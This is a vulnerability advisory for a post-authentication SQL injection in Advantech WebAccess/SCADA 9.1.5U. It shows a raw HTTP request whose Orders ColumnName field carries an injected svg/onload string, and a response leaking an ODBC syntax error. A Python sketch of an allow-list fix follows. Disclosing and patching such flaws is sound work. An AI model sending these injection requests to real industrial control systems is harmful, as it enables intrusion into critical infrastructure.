Headline
AdvantechWeb/SCADA 9.1.5U SQL Injection
AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability.
;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U
;;
;; found: 28.12.2023
;;
;; more:
;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html
;;

POST /waconfig/api/odbc/getSystemLog HTTP/2
Host: 192.168.56.106
Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 359
Origin: https://192.168.56.106
Referer: https://192.168.56.106/waconfig/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}

resp:

HTTP/2 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 225
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
X-Ua-Compatible: IE=EmulateIE7
Access-Control-Allow-Origin: http://localhost:8080
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=31536000;includeSubDomains;preload
X-Content-Type-Options: nosniff
Date: Thu, 28 Dec 2023 21:29:56 GMT

{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."}

;; cheers
;;
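
The response above shows the `Orders[].ColumnName` value landing inside the query expression and the ODBC driver message being returned to the client. The sketch below is an added example, not part of the original advisory and not the product's code: it shows an allow-list for the sort key plus a generic error reply. The column names, function names and the `-400` error value are assumptions made for illustration.

```python
import json

# Hypothetical column names; the real system-log schema is not shown on the page.
SORTABLE = {"LogTime": "[LogTime]", "UserName": "[UserName]",
            "IPAddress": "[IPAddress]", "NodeName": "[NodeName]"}
DIRECTIONS = {"ASC", "DESC"}


class InvalidOrder(ValueError):
    """Raised when a sort key or direction is not on the allow-list."""


def build_order_by(orders, default="[LogTime] DESC"):
    """Build ORDER BY from server-side constants only.

    Identifiers cannot be bound as query parameters, so the client value
    only selects an allow-listed name and is never concatenated itself.
    """
    if not isinstance(orders, list):
        raise InvalidOrder("Orders must be a list")
    terms = []
    for item in orders:
        if not isinstance(item, dict):
            raise InvalidOrder("order entry must be an object")
        column = item.get("ColumnName")
        direction = str(item.get("descending", "ASC")).upper()
        if not isinstance(column, str) or column not in SORTABLE:
            raise InvalidOrder("unknown sort column")
        if direction not in DIRECTIONS:
            raise InvalidOrder("unknown sort direction")
        terms.append(f"{SORTABLE[column]} {direction}")
    return "ORDER BY " + (", ".join(terms) or default)


def handle_get_system_log(raw_body):
    """Return (status, response); rejected input gets a generic error."""
    try:
        body = json.loads(raw_body)
        order_by = build_order_by(body.get("Orders", []))
    except (InvalidOrder, json.JSONDecodeError, AttributeError):
        # Do not echo the submitted value or a driver message to the client.
        return 400, {"error": -400, "reason": "invalid request"}
    return 200, {"order_by": order_by}


# Constructed sample bodies; the first ColumnName is the value from the advisory.
ADVISORY_BODY = json.dumps({"Orders": [{"ColumnName": "%27>%22><svg/onload=prompt(123)>",
                                        "descending": "DESC"}], "PageSize": 50})
BENIGN_BODY = json.dumps({"Orders": [{"ColumnName": "UserName", "descending": "DESC"}]})

if __name__ == "__main__":
    print(handle_get_system_log(ADVISORY_BODY))
    print(handle_get_system_log(BENIGN_BODY))
```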